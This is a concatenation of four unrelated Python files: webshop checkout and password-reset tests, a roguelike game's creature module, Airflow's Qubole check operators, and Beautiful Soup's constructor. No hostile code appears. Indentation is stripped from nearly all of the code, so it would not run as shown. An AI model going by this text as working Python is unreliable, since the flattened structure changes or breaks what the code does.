data={
'product': product1.products[0].id,
'quantity': 5
}
)
self.assertEqual(rv.status_code, 302)
# Now sign in to checkout.
rv = c.post(
'/checkout/sign-in',
data={
'email': 'email@example.com',
'password': 'password',
'checkout_mode': 'account'
}
)
self.assertEqual(rv.status_code, 302)
self.assertTrue(rv.location.endswith('/shipping-address'))
# Shipping address page should render.
rv = c.get('/checkout/shipping-address')
self.assertEqual(rv.status_code, 200)
# Copied from nereid-checkout - adding shipping address.
rv = c.post(
'/checkout/shipping-address',
data={
'name': 'Sharoon Thomas',
'street': 'Biscayne Boulevard',
'streetbis': 'Apt. 1906, Biscayne Park',
'zip': 'FL33137',
'city': 'Miami',
'phone': '1234567890',
'country': country.id,
'subdivision': subdivision.id,
}
)
self.assertEqual(rv.status_code, 302)
self.assertTrue(
rv.location.endswith('/checkout/validate-address')
)
# Copied from nereid-checkout - adding billing address.
rv = c.post(
'/checkout/billing-address',
data={
'name': 'Sharoon Thomas',
'street': 'Biscayne Boulevard',
'streetbis': 'Apt. 1906, Biscayne Park',
'zip': 'FL33137',
'city': 'Miami',
'phone': '1234567890',
'country': country.id,
'subdivision': subdivision.id,
}
)
self.assertEqual(rv.status_code, 302)
self.assertTrue(
rv.location.endswith('/checkout/payment')
)
with Transaction().set_context(company=self.company.id):
self._create_auth_net_gateway_for_site()
# Try to pay using credit card
rv = c.post(
'/checkout/payment',
data={
'owner': 'Joe Blow',
'number': '4111111111111111',
'expiry_year': '2018',
'expiry_month': '01',
'cvv': '911',
'add_card_to_profiles': '',
}
)
self.assertEqual(rv.status_code, 302)
self.assertTrue('/order/' in rv.location)
self.assertTrue('access_code' in rv.location)
sale, = self.Sale.search([('state', '=', 'confirmed')])
payment_transaction, = sale.gateway_transactions
self.assertEqual(payment_transaction.amount, sale.total_amount)
rv = c.get('/order/{0}'.format(sale.id))
self.assertEqual(rv.status_code, 200)
rv = c.get(
'/order/{0}?access_code={1}'
.format(sale.id, sale.guest_access_code)
)
self.assertEqual(rv.status_code, 200)
def test_0065_password_reset(self):
"""
Test for password reset.
"""
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
app = self.get_app()
with app.test_client() as c:
# Resetting without login
rv = c.get('/reset-account')
self.assertEqual(rv.status_code, 200)
# Resetting through email
response = c.post(
'/reset-account',
data={
'email': 'email@example.com'
}
)
self.assertEqual(response.status_code, 302)
# Login after requesting activation code.
self.login(c, 'email@example.com', 'password')
# Reset properly.
with app.test_client() as c:
response = c.post(
'/reset-account',
data={
'email': 'email@example.com'
}
)
self.assertEqual(response.status_code, 302)
# Resetting with an invalid code.
# Login with new pass should be rejected.
invalid = 'badcode'
response = c.post(
'/new-password/{0}/{1}'.format(
self.registered_user.id,
invalid
),
data={
'password': 'reset-pass',
'confirm': 'reset-pass'
}
)
self.assertEqual(response.status_code, 302)
response = c.post(
'/login',
data={
'email': 'email@example.com',
'password': 'reset-pass'
}
)
# The login attempt is rejected; the form re-renders with status 200.
self.assertEqual(response.status_code, 200)
# Now do it with the right code.
# This time, login with old pass should be rejected.
response = c.post(
self.registered_user.get_reset_password_link(),
data={
'password': 'reset-pass',
'confirm': 'reset-pass'
}
)
self.assertEqual(response.status_code, 302)
response = c.post(
'/login',
data={
'email': 'email@example.com',
'password': 'password'
}
)
self.assertEqual(response.status_code, 200)
self.login(c, 'email@example.com', 'reset-pass')
def test_0070_change_password(self):
"""
Test for password change.
"""
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
app = self.get_app()
data = {
'party': self.party2.id,
'display_name': 'Registered User',
'email': 'email@example.com',
'password': 'password',
'company': self.company.id
}
with app.test_client() as c:
response = c.get('/change-password')
# Without login
self.assertEqual(response.status_code, 302)
# Try POST, but without login
response = c.post('/change-password', data={
'password': data['password'],
'confirm': data['password']
})
self.assertEqual(response.status_code, 302)
# Now login
self.login(c, data['email'], data['password'])
# Incorrect password confirmation
response = c.post(
'/change-password',
data={
'password': 'new-password',
'confirm': 'oh-no-you-dont'
}
)
self.assertEqual(response.status_code, 200)
self.assertTrue("must match" in response.data)
# Send proper confirmation but without old password.
response = c.post(
'/change-password',
data={
'password': 'new-pass',
'confirm': 'new-pass'
}
)
self.assertEqual(response.status_code, 200)
# Send proper confirmation with wrong old password
response = c.post(
'/change-password',
data={
'old_password': 'passw',
'password': 'new-pass',
'confirm': 'new-pass'
}
)
self.assertEqual(response.status_code, 200)
self.assertTrue(
'current password you entered is invalid' in response.data
)
# Do it right
response = c.post(
'/change-password',
data={
'old_password': data['password'],
'password': 'new-pass',
'confirm': 'new-pass'
}
)
self.assertEqual(response.status_code, 302)
# Check login with new pass
c.get('/logout')
self.login(c, data['email'], 'new-pass')
def test_0075_products(self):
"""
Tests product templates and variants.
"""
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
app = self.get_app()
with app.test_client() as c:
self.create_test_products()
rv = c.get('/products')
self.assertIn('product 1', rv.data)
self.assertIn('product 2', rv.data)
self.assertIn('product 3', rv.data)
rv = c.get('/product/product-1')
self.assertEqual(rv.status_code, 200)
self.assertIn('product 1', rv.data)
template1, = self.ProductTemplate.search([
('name', '=', 'product 1')
])
template1.active = False
template1.save()
rv = c.get('/product/product-1')
self.assertEqual(rv.status_code, 404)
def test_0080_search_results(self):
"""
Test the search results template.
"""
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
app = self.get_app()
with app.test_client() as c:
self.create_test_products()
rv = c.get('/search?q=product')
self.assertIn('product 1', rv.data)
self.assertIn('product-1', rv.data)
self.assertIn('product 2', rv.data)
self.assertIn('product-2', rv.data)
self.assertIn('product 3', rv.data)
self.assertIn('product-3', rv.data)
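# A minimal runner hook, sketched after the usual trytond test layout;
# the collector entry point name is an assumption.
def suite():
    """Return a suite containing the template tests."""
    test_suite = unittest.TestSuite()
    test_suite.addTests(
        unittest.TestLoader().loadTestsFromTestCase(TestTemplates)
    )
    return test_suite


if __name__ == '__main__':
    unittest.main(defaultTest='suite')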
|
|
from ai import *
from tweaks import log as LOG
from graphics import MessageBox as MSG
log = lambda *x: LOG(*x, f='logs/creatures.log')
class Stats:
possible = []
@staticmethod
def init_class():
# Load the stat definitions from stats.txt once, at class set-up time.
with open('stats.txt') as stats_file:
for line in stats_file:
if '#' in line: continue
long_name, short, description = line[:-1].split(':')
Stats.possible += [[long_name, short, description]]
def __init__(self, dic):
assert(set([i[1] for i in Stats.possible]) == set(dic.keys()))
self.dic = dic.copy()
def copy(self):
return Stats(self.dic)
Stats.init_class()
class Race:
def __init__(self, racename, symbol, ai_class):
assert(type(racename) == str)
assert(type(symbol) == str)
assert(len(symbol) == 1)
self.name = racename
self.symbol = symbol
self.ai_class = ai_class
def set_stats(self, stats):
assert(type(stats) == Stats)
self.stats = stats
human_race = Race('human', 'h', random_AI)
goblin_race = Race('goblin', 'g', seeker_AI)
dwarven_race = Race('dwarf', 'd', idiot_AI)
class BodyPart:
def __init__(self, name, size, functions):
self.name = name
self.size = size
self.functions = functions
self.health = 100  # 100 is excellent, 0 is gone, <50 is a serious malfunction
# Which functions are vital is decided per creature, depending on its needs.
# Damage is also stored here.
def clone(self):
return BodyPart(self.name, self.size, self.functions) #A fully healed copy
def take_damage(self, dmg):
assert(dmg >= 0)
self.health -= min(dmg, self.health)
log(self.name, 'takes', dmg, 'damage')
heart = BodyPart('heart', '0.5', ['blood pressure'])
brain = BodyPart('brain', '2', ['consciousness', 'perception', 'control'])
skin = BodyPart('skin', '10', ['disease resistance', 'protection'])
hand = BodyPart('hand', '5', ['manipulation'])
eyes = BodyPart('eyes', '1', ['vision'])
class Body:
def __init__(self, parts, root, connect):
# connect is a list of tuples, each holding a pair of connected organs
# ordered from root to skin, e.g. ('brain', 'skull').
for i in parts:
if i.name == root.name:
parts.remove(i)
self.parts = [i.clone() for i in parts]
self.root = root.clone()
self.parts.append(self.root)
self.connect = connect  # Kept so that clone() can rebuild the connection graph.
for i in range(len(self.parts)):
self.parts[i].outside = []
self.parts[i].inside = []
for fro,to in connect:
if self.parts[i].name == fro:
for j in self.parts:
if j.name == to:
to = j
break
self.parts[i].outside.append(to)
elif self.parts[i].name == to:
for j in self.parts:
if j.name == fro:
fro = j
break
self.parts[i].inside.append(fro)
def clone(self):
return Body([i.clone() for i in self.parts], self.root.clone(), self.connect[:])
bdy = Body([heart, brain, skin, eyes], brain, [('brain', 'heart'), ('brain', 'skin'), ('heart', 'skin'), ('brain', 'eyes')])
class Creature:
symbol = None
__max_id = 0
__reg = []
def __init__(self, race, name, body_template, stats=None, ai=None):
for i in Creature.__reg:
if i.name == name:
raise ValueError('creature name %r is already taken' % name)
self.name = name
if stats is None:
stats = race.stats
if ai is None:
self.AI = race.ai_class(self)
elif isinstance(ai, type):
self.AI = ai(self)
else:
self.AI = ai
assert(isinstance(race, Race))
assert(type(name) == str)
self.needs = set()
self.body = body_template.clone()
for p in self.body.parts:
for f in p.functions:
self.needs.add(f)
self.race = race
self.alive = True
Creature.__max_id += 1
self.id = Creature.__max_id
Creature.__reg.append(self)
self.stats = stats
self.vision = self.stats.dic['VSN']
self.controlled_by_player = False
self.light = 0
self.effects = set()
self.check_health()
log('init called')
def check_health(self):
functions = set()
log(self.body.parts, self.body.root.outside)
for j in self.body.parts:
if j.health <= 50:
for i in j.functions:
if i == 'vision':
self.effects.add('blind')
elif i == 'consciousness':
self.effects.add('unconscious')
elif i == 'control':
self.effects.add('unconscious')
for p in self.body.parts:
if p.health <= 0:
if len(p.inside) == 1 and p in p.inside[0].outside:
p.inside[0].outside.remove(p)
log(self.name, p.name, 'is GONE, health is', p.health)
q = [p]
while q != []:
curr, q = q[0], q[1:]
for i in curr.outside:
if i.inside == [curr] and i not in q:
q.append(i)
self.body.parts.remove(curr)
if curr == self.body.root:
return False
else:
log(self.name, p.name, 'is OK, health is', p.health)
for p in self.body.parts:
for f in p.functions:
functions.add(f)
if functions == self.needs:
return True
else:
self.effects = set()
for i in self.needs - functions:
if i == 'vision':
self.effects.add('blind')
elif i == 'consciousness':
self.effects.add('unconscious')
elif i == 'control':
return False
elif i == 'blood pressure':
return False
return True
def get_symbol(self):
return self.symbol if self.symbol is not None else self.race.symbol
def can_pass_through(self, cell):
if cell.floor.name not in ['sand', 'stone', 'dirt']: return False
if cell.fill.name not in ['air', 'void']: return False
if cell.statics is not None and any(not i.passible for i in cell.statics): return False
return True
def die(self):
self.AI = None
if self.controlled_by_player:
MSG.pop('You die')
self.alive = False
def where_is(self):
try:
return (self.x, self.y)
except AttributeError:
# The creature has not been placed yet.
return None
@property
def position(self):
return (self.x, self.y)
@position.setter
def position(self, p):
self.x, self.y = p
@staticmethod
def by_id(ID):
for i in Creature.__reg:
if i.id == ID:
return i
def get_stat(self, stat):
if stat in self.stats.dic:
return self.stats.dic[stat]
else:
raise ValueError('No such stat -', stat)
# INTERACTIONS
def open_door(self, d):
if d.kind != 'closed_door':
return False
if self.stats.dic['INT'] < 2:
return False
d.kind = 'open_door'
d.passible = True
d.symbol = '/'
d.transparent = True
return True
def close_door(self, d):
if d.kind != 'open_door':
return False
if self.stats.dic['INT'] < 2:
return False
d.kind = 'closed_door'
d.passible = False
d.symbol = '+'
d.transparent = False
return True
def can(self, action):
manual_actions = 'open_door close_door grab'.split()
perception_actions = 'see hear smell'.split()
if action in manual_actions:
if 'manipulation' not in self.needs:
return False
for p in self.body.parts:
if 'manipulation' in p.functions:
return True
return False
if action in perception_actions:
flag = False
if 'perception' not in self.needs:
return False
if 'blind' in self.effects: return False
for p in self.body.parts:
if 'perception' in p.functions:
flag = True
if not flag: return False
if 'vision' not in self.needs:
return False
for p in self.body.parts:
if 'vision' in p.functions:
return True
return False
''' RACE STATS '''
human_stats = Stats({
'CHR': 10,
'STR': 10,
'INT': 10,
'LCK': 10,
'FCS': 10,
'WPR': 10,
'DXT': 10,
'SPD': 10,
'VSN': 40
})
human_race.set_stats(human_stats.copy())
goblin_race.set_stats(human_stats.copy())
dwarven_race.set_stats(human_stats.copy())
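# A minimal usage sketch. It assumes stats.txt defines the short stat
# names used above and that the ai module provides the referenced AI
# classes; the creature name and damage value are illustrative only.
if __name__ == '__main__':
    bob = Creature(human_race, 'Bob', bdy)
    bob.body.root.take_damage(60)  # wound the brain (the root part)
    print(bob.check_health(), bob.effects)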
|
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from airflow.exceptions import AirflowException
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.providers.qubole.hooks.qubole_check import QuboleCheckHook
from airflow.providers.qubole.operators.qubole import QuboleOperator
from airflow.utils.decorators import apply_defaults
class QuboleCheckOperator(CheckOperator, QuboleOperator):
"""
Performs checks against Qubole Commands. ``QuboleCheckOperator`` expects
a command that will be executed on QDS.
By default, each value on the first row of the result of this Qubole
command is evaluated using Python ``bool`` casting. If any of the
values casts to ``False``, the check fails and errors out.
Note that Python bool casting evaluates the following as ``False``:
* ``False``
* ``0``
* Empty string (``""``)
* Empty list (``[]``)
* Empty dictionary or set (``{}``)
Given a query like ``SELECT COUNT(*) FROM foo``, it will fail only if
the count ``== 0``. You can craft a much more complex query that could,
for instance, check that the table has the same number of rows as
the source table upstream, that the count of today's partition is
greater than yesterday's partition, or that a set of metrics is less
than three standard deviations from the 7-day average.
This operator can be used as a data quality check in your pipeline.
Depending on where you put it in your DAG, you can either halt the
critical path and prevent the publishing of dubious data, or run it
on the side and receive email alerts without stopping the progress
of the DAG.
:param qubole_conn_id: Connection id which consists of qds auth_token
:type qubole_conn_id: str
kwargs:
Arguments specific to the Qubole command are described in the
QuboleOperator docs.
:results_parser_callable: An optional Python callable that parses
the list of rows returned by the Qubole command, giving users more
flexibility. By default, only the values on the first row are used
for performing checks. The callable should return a list of records
on which the checks are performed.
.. note:: All fields in common with template fields of
QuboleOperator and CheckOperator are template-supported.
"""
template_fields = QuboleOperator.template_fields + CheckOperator.template_fields
template_ext = QuboleOperator.template_ext
ui_fgcolor = '#000'
@apply_defaults
def __init__(self, qubole_conn_id="qubole_default", *args, **kwargs):
sql = get_sql_from_qbol_cmd(kwargs)
super().__init__(qubole_conn_id=qubole_conn_id, sql=sql, *args, **kwargs)
self.on_failure_callback = QuboleCheckHook.handle_failure_retry
self.on_retry_callback = QuboleCheckHook.handle_failure_retry
def execute(self, context=None):
try:
self.hook = self.get_hook(context=context)
super().execute(context=context)
except AirflowException as e:
handle_airflow_exception(e, self.get_hook())
def get_db_hook(self):
return self.get_hook()
def get_hook(self, context=None):
if hasattr(self, 'hook') and (self.hook is not None):
return self.hook
else:
return QuboleCheckHook(context=context, *self.args, **self.kwargs)
def __getattribute__(self, name):
if name in QuboleCheckOperator.template_fields:
if name in self.kwargs:
return self.kwargs[name]
else:
return ''
else:
return object.__getattribute__(self, name)
def __setattr__(self, name, value):
if name in QuboleCheckOperator.template_fields:
self.kwargs[name] = value
else:
object.__setattr__(self, name, value)
class QuboleValueCheckOperator(ValueCheckOperator, QuboleOperator):
"""
Performs a simple value check using a Qubole command.
By default, each value on the first row of the
command's result is compared with a pre-defined value.
The check fails and errors out if the output of the command
is not within the permissible limits of the expected value.
:param qubole_conn_id: Connection id which consists of qds auth_token
:type qubole_conn_id: str
:param pass_value: Expected value of the query results.
:type pass_value: str or int or float
:param tolerance: Defines the permissible pass_value range as a ratio:
with a tolerance of 0.5, the Qubole command output can be anything
between 0.5*pass_value and 1.5*pass_value without the operator
erring out.
:type tolerance: int or float
kwargs:
Arguments specific to the Qubole command are described in the
QuboleOperator docs.
:results_parser_callable: An optional Python callable that parses
the list of rows returned by the Qubole command, giving users more
flexibility. By default, only the values on the first row are used
for performing checks. The callable should return a list of records
on which the checks are performed.
.. note:: All fields in common with template fields of
QuboleOperator and ValueCheckOperator are template-supported.
"""
template_fields = QuboleOperator.template_fields + ValueCheckOperator.template_fields
template_ext = QuboleOperator.template_ext
ui_fgcolor = '#000'
@apply_defaults
def __init__(self, pass_value, tolerance=None, results_parser_callable=None,
qubole_conn_id="qubole_default", *args, **kwargs):
sql = get_sql_from_qbol_cmd(kwargs)
super().__init__(
qubole_conn_id=qubole_conn_id,
sql=sql, pass_value=pass_value, tolerance=tolerance,
*args, **kwargs)
self.results_parser_callable = results_parser_callable
self.on_failure_callback = QuboleCheckHook.handle_failure_retry
self.on_retry_callback = QuboleCheckHook.handle_failure_retry
def execute(self, context=None):
try:
self.hook = self.get_hook(context=context)
super().execute(context=context)
except AirflowException as e:
handle_airflow_exception(e, self.get_hook())
def get_db_hook(self):
return self.get_hook()
def get_hook(self, context=None):
if hasattr(self, 'hook') and (self.hook is not None):
return self.hook
else:
return QuboleCheckHook(
context=context,
*self.args,
results_parser_callable=self.results_parser_callable,
**self.kwargs
)
def __getattribute__(self, name):
if name in QuboleValueCheckOperator.template_fields:
if name in self.kwargs:
return self.kwargs[name]
else:
return ''
else:
return object.__getattribute__(self, name)
def __setattr__(self, name, value):
if name in QuboleValueCheckOperator.template_fields:
self.kwargs[name] = value
else:
object.__setattr__(self, name, value)
def get_sql_from_qbol_cmd(params):
sql = ''
if 'query' in params:
sql = params['query']
elif 'sql' in params:
sql = params['sql']
return sql
def handle_airflow_exception(airflow_exception, hook):
cmd = hook.cmd
if cmd is not None:
if cmd.is_success(cmd.status):
qubole_command_results = hook.get_query_results()
qubole_command_id = cmd.id
exception_message = '\nQubole Command Id: {qubole_command_id}' \
'\nQubole Command Results:' \
'\n{qubole_command_results}'.format(
qubole_command_id=qubole_command_id, # noqa: E122
qubole_command_results=qubole_command_results)
raise AirflowException(str(airflow_exception) + exception_message)
raise AirflowException(str(airflow_exception))
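# A hypothetical sketch of wiring the check operator into a DAG. The DAG
# id, task id, query, and thresholds are illustrative only; real use
# depends on a configured Qubole connection.
def _example_usage():
    from datetime import datetime

    from airflow import DAG

    with DAG('qubole_check_example', start_date=datetime(2020, 1, 1),
             schedule_interval=None) as dag:
        QuboleValueCheckOperator(
            task_id='check_row_count',
            command_type='hivecmd',
            query='SELECT COUNT(*) FROM my_table',
            pass_value=100,
            tolerance=0.1,
        )
    return dag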
|
|
"""Beautiful Soup Elixir and Tonic - "The Screen-Scraper's Friend".
http://www.crummy.com/software/BeautifulSoup/
Beautiful Soup uses a pluggable XML or HTML parser to parse a
(possibly invalid) document into a tree representation. Beautiful Soup
provides methods and Pythonic idioms that make it easy to navigate,
search, and modify the parse tree.
Beautiful Soup works with Python 2.7 and up. It works better if lxml
and/or html5lib is installed.
For more than you ever wanted to know about Beautiful Soup, see the
documentation: http://www.crummy.com/software/BeautifulSoup/bs4/doc/
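A minimal usage sketch, using the parser bundled with the standard
library (lxml or html5lib could be substituted):

    from bs4 import BeautifulSoup
    soup = BeautifulSoup("<p>Some <b>bold</b> text</p>", "html.parser")
    print(soup.b.get_text())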
"""
__author__ = "Leonard Richardson (leonardr@segfault.org)"
__version__ = "4.9.3"
__copyright__ = "Copyright (c) 2004-2020 Leonard Richardson"
# Use of this source code is governed by the MIT license.
__license__ = "MIT"
__all__ = ['BeautifulSoup']
from collections import Counter
import os
import re
import sys
import traceback
import warnings
from .builder import builder_registry, ParserRejectedMarkup
from .dammit import UnicodeDammit
from .element import (
CData,
Comment,
DEFAULT_OUTPUT_ENCODING,
Declaration,
Doctype,
NavigableString,
PageElement,
ProcessingInstruction,
PYTHON_SPECIFIC_ENCODINGS,
ResultSet,
Script,
Stylesheet,
SoupStrainer,
Tag,
TemplateString,
)
# The very first thing the Python 2 source does is give a useful error
# if someone runs it under Python 3 without converting it; in this
# converted source the comparison below is a harmless no-op.
'You are trying to run the Python 2 version of Beautiful Soup under Python 3. This will not work.'!='You need to convert the code, either by installing it (`python setup.py install`) or by running 2to3 (`2to3 -w bs4`).'
# Define some custom warnings.
class GuessedAtParserWarning(UserWarning):
"""The warning issued when BeautifulSoup has to guess what parser to
use -- probably because no parser was specified in the constructor.
"""
class MarkupResemblesLocatorWarning(UserWarning):
"""The warning issued when BeautifulSoup is given 'markup' that
actually looks like a resource locator -- a URL or a path to a file
on disk.
"""
class BeautifulSoup(Tag):
"""A data structure representing a parsed HTML or XML document.
Most of the methods you'll call on a BeautifulSoup object are inherited from
PageElement or Tag.
Internally, this class defines the basic interface called by the
tree builders when converting an HTML/XML document into a data
structure. The interface abstracts away the differences between
parsers. To write a new tree builder, you'll need to understand
these methods as a whole.
These methods will be called by the BeautifulSoup constructor:
* reset()
* feed(markup)
The tree builder may call these methods from its feed() implementation:
* handle_starttag(name, attrs) # See note about return value
* handle_endtag(name)
* handle_data(data) # Appends to the current data node
* endData(containerClass) # Ends the current data node
No matter how complicated the underlying parser is, you should be
able to build a tree using 'start tag' events, 'end tag' events,
'data' events, and "done with data" events.
If you encounter an empty-element tag (aka a self-closing tag,
like HTML's <br> tag), call handle_starttag and then
handle_endtag.
"""
# Since BeautifulSoup subclasses Tag, it's possible to treat it as
# a Tag with a .name. This name makes it clear the BeautifulSoup
# object isn't a real markup tag.
ROOT_TAG_NAME = '[document]'
# If the end-user gives no indication which tree builder they
# want, look for one with these features.
DEFAULT_BUILDER_FEATURES = ['html', 'fast']
# A string containing all ASCII whitespace characters, used in
# endData() to detect data chunks that seem 'empty'.
ASCII_SPACES = '\x20\x0a\x09\x0c\x0d'
NO_PARSER_SPECIFIED_WARNING = "No parser was explicitly specified, so I'm using the best available %(markup_type)s parser for this system (\"%(parser)s\"). This usually isn't a problem, but if you run this code on another system, or in a different virtual environment, it may use a different parser and behave differently.\n\nThe code that caused this warning is on line %(line_number)s of the file %(filename)s. To get rid of this warning, pass the additional argument 'features=\"%(parser)s\"' to the BeautifulSoup constructor.\n"
def __init__(self, markup="", features=None, builder=None,
parse_only=None, from_encoding=None, exclude_encodings=None,
element_classes=None, **kwargs):
"""Constructor.
:param markup: A string or a file-like object representing
markup to be parsed.
:param features: Desirable features of the parser to be
used. This may be the name of a specific parser ("lxml",
"lxml-xml", "html.parser", or "html5lib") or it may be the
type of markup to be used ("html", "html5", "xml"). It's
recommended that you name a specific parser, so that
Beautiful Soup gives you the same results across platforms
and virtual environments.
:param builder: A TreeBuilder subclass to instantiate (or
instance to use) instead of looking one up based on
`features`. You only need to use this if you've implemented a
custom TreeBuilder.
:param parse_only: A SoupStrainer. Only parts of the document
matching the SoupStrainer will be considered. This is useful
when parsing part of a document that would otherwise be too
large to fit into memory.
:param from_encoding: A string indicating the encoding of the
document to be parsed. Pass this in if Beautiful Soup is
guessing wrongly about the document's encoding.
:param exclude_encodings: A list of strings indicating
encodings known to be wrong. Pass this in if you don't know
the document's encoding but you know Beautiful Soup's guess is
wrong.
:param element_classes: A dictionary mapping BeautifulSoup
classes like Tag and NavigableString, to other classes you'd
like to be instantiated instead as the parse tree is
built. This is useful for subclassing Tag or NavigableString
to modify default behavior.
:param kwargs: For backwards compatibility purposes, the
constructor accepts certain keyword arguments used in
Beautiful Soup 3. None of these arguments do anything in
Beautiful Soup 4; they will result in a warning and then be
ignored.
Apart from this, any keyword arguments passed into the
BeautifulSoup constructor are propagated to the TreeBuilder
constructor. This makes it possible to configure a
TreeBuilder by passing in arguments, not just by saying which
one to use.
"""
if 'convertEntities' in kwargs:
del kwargs['convertEntities']
warnings.warn(
"BS4 does not respect the convertEntities argument to the "
"BeautifulSoup constructor. Entities are always converted "
"to Unicode characters.")
if 'markupMassage' in kwargs:
del kwargs['markupMassage']
warnings.warn(
"BS4 does not respect the markupMassage argument to the "
"BeautifulSoup constructor. The tree builder is responsible "
"for any necessary markup massage.")
if 'smartQuotesTo' in kwargs:
del kwargs['smartQuotesTo']
warnings.warn(
"BS4 does not respect the smartQuotesTo argument to the "
"BeautifulSoup constructor. Smart quotes are always converted "
"to Unicode characters.")
if 'selfClosingTags' in kwargs:
del kwargs['selfClosingTags']
warnings.warn(
"BS4 does not respect the selfClosingTags argument to the "
"BeautifulSoup constructor. The tree builder is responsible "
"for understanding self-closing tags.")
if 'isHTML' in kwargs:
del kwargs['isHTML']
warnings.warn(
"BS4 does not respect the isHTML argument to the "
"BeautifulSoup constructor. Suggest you use "
"features='lxml' for HTML and features='lxml-xml' for "
"XML.")
def deprecated_argument(old_name, new_name):
if old_name in kwargs:
warnings.warn(
'The "%s" argument to the BeautifulSoup constructor '
'has been renamed to "%s."' % (old_name, new_name))
value = kwargs[old_name]
del kwargs[old_name]
return value
return None
parse_only = parse_only or deprecated_argument(
"parseOnlyThese", "parse_only")
from_encoding = from_encoding or deprecated_argument(
"fromEncoding", "from_encoding")
if from_encoding and isinstance(markup, str):
warnings.warn("You provided Unicode markup but also provided a value for from_encoding. Your from_encoding will be ignored.")
from_encoding = None
self.element_classes = element_classes or dict()
# We need this information to track whether or not the builder
# was specified well enough that we can omit the 'you need to
# specify a parser' warning.
original_builder = builder
original_features = features
if isinstance(builder, type):
# A builder class was passed in; it needs to be instantiated.
builder_class = builder
builder = None
elif builder is None:
if isinstance(features, str):
features = [features]
if features is None or len(features) == 0:
features = self.DEFAULT_BUILDER_FEATURES
builder_class = builder_registry.lookup(*features)
if builder_class is None:
raise FeatureNotFound(
"Couldn't find a tree builder with the features you "
"requested: %s. Do you need to install a parser library?"
% ",".join(features))
# At this point either we have a TreeBuilder instance in
# builder, or we have a builder_class that we can instantiate
# with the remaining **kwargs.
if builder is None:
builder = builder_class(**kwargs)
if not original_builder and not (
original_features == builder.NAME or
original_features in builder.ALTERNATE_NAMES
) and markup:
# The user did not tell us which TreeBuilder to use,
# and we had to guess. Issue a warning.
if builder.is_xml:
markup_type = "XML"
else:
markup_type = "HTML"
            # This code is adapted from warnings.py so that we get the same
            # line of code as our warnings.warn() call gets, even if the
            # answer is wrong (as it may be in a multithreading situation).
caller = None
try:
caller = sys._getframe(1)
except ValueError:
pass
if caller:
globals = caller.f_globals
line_number = caller.f_lineno
else:
globals = sys.__dict__
                line_number = 1
filename = globals.get('__file__')
if filename:
fnl = filename.lower()
if fnl.endswith((".pyc", ".pyo")):
filename = filename[:-1]
if filename:
# If there is no filename at all, the user is most likely in a REPL,
# and the warning is not necessary.
values = dict(
filename=filename,
line_number=line_number,
parser=builder.NAME,
markup_type=markup_type
)
warnings.warn(
self.NO_PARSER_SPECIFIED_WARNING % values,
GuessedAtParserWarning, stacklevel=2
)
else:
if kwargs:
warnings.warn("Keyword arguments to the BeautifulSoup constructor will be ignored. These would normally be passed into the TreeBuilder constructor, but a TreeBuilder instance was passed in as `builder`.")
self.builder = builder
self.is_xml = builder.is_xml
self.known_xml = self.is_xml
self._namespaces = dict()
self.parse_only = parse_only
self.builder.initialize_soup(self)
if hasattr(markup, 'read'): # It's a file-type object.
markup = markup.read()
        elif len(markup) <= 256 and (
                (isinstance(markup, bytes) and b'<' not in markup)
                or (isinstance(markup, str) and '<' not in markup)
        ):
# Print out warnings for a couple beginner problems
# involving passing non-markup to Beautiful Soup.
# Beautiful Soup will still parse the input as markup,
# just in case that's what the user really wants.
if (isinstance(markup, str)
and not os.path.supports_unicode_filenames):
possible_filename = markup.encode("utf8")
else:
possible_filename = markup
is_file = False
try:
is_file = os.path.exists(possible_filename)
except Exception as e:
# This is almost certainly a problem involving
# characters not valid in filenames on this
# system. Just let it go.
pass
if is_file:
warnings.warn(
'"%s" looks like a filename, not markup. You should'
' probably open this file and pass the filehandle into'
' Beautiful Soup.' % self._decode_markup(markup),
MarkupResemblesLocatorWarning
)
self._check_markup_is_url(markup)
rejections = []
success = False
for (self.markup, self.original_encoding, self.declared_html_encoding,
self.contains_replacement_characters) in (
self.builder.prepare_markup(
markup, from_encoding, exclude_encodings=exclude_encodings)):
self.reset()
try:
self._feed()
success = True
break
except ParserRejectedMarkup as e:
rejections.append(e)
pass
if not success:
other_exceptions = [str(e) for e in rejections]
raise ParserRejectedMarkup(
"The markup you provided was rejected by the parser. Trying a different parser or a different encoding may help.\n\nOriginal exception(s) from parser:\n " + "\n ".join(other_exceptions)
)
# Clear out the markup and remove the builder's circular
# reference to this object.
self.markup = None
self.builder.soup = None
def __copy__(self):
"""Copy a BeautifulSoup object by converting the document to a string and parsing it again."""
copy = type(self)(
self.encode('utf-8'), builder=self.builder, from_encoding='utf-8'
)
# Although we encoded the tree to UTF-8, that may not have
# been the encoding of the original markup. Set the copy's
# .original_encoding to reflect the original object's
# .original_encoding.
copy.original_encoding = self.original_encoding
return copy
def __getstate__(self):
# Frequently a tree builder can't be pickled.
d = dict(self.__dict__)
if 'builder' in d and not self.builder.picklable:
d['builder'] = None
return d
@classmethod
def _decode_markup(cls, markup):
"""Ensure `markup` is bytes so it's safe to send into warnings.warn.
TODO: warnings.warn had this problem back in 2010 but it might not
anymore.
"""
if isinstance(markup, bytes):
decoded = markup.decode('utf-8', 'replace')
else:
decoded = markup
return decoded
@classmethod
def _check_markup_is_url(cls, markup):
"""Error-handling method to raise a warning if incoming markup looks
like a URL.
:param markup: A string.
"""
if isinstance(markup, bytes):
space = b' '
cant_start_with = (b"http:", b"https:")
elif isinstance(markup, str):
space = ' '
cant_start_with = ("http:", "https:")
else:
return
if any(markup.startswith(prefix) for prefix in cant_start_with):
            if space not in markup:
warnings.warn(
'"%s" looks like a URL. Beautiful Soup is not an'
' HTTP client. You should probably use an HTTP client like'
' requests to get the document behind the URL, and feed'
' that document to Beautiful Soup.' % cls._decode_markup(
markup
),
MarkupResemblesLocatorWarning
)
